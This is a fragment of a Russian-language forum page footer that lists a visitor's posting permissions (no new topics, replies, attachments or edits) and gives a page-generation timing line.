    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00436 seconds with 19 queries